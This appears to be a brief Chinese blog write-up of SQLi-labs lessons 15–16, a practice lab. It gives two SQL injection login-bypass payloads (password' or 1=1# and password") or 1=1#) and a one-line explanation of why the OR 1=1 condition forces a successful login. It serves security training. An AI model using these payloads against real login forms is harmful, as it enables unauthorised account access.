Less-15
这个注入使用的是布尔值注入:
uname=admin&passwd=password' or 1=1#&submit=Submit
SQL数据库在查询的时候,因为后面的or 1=1,所以无论前面的查询是否正确,都会返回一个正确的结果,这样就可以Iogged In。
Less-16
同上:
uname=admin&passwd=password") or 1=1#&submit=Submit
Less-15~16
本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可
Ricky
这个人很懒,什么都没留下
文章评论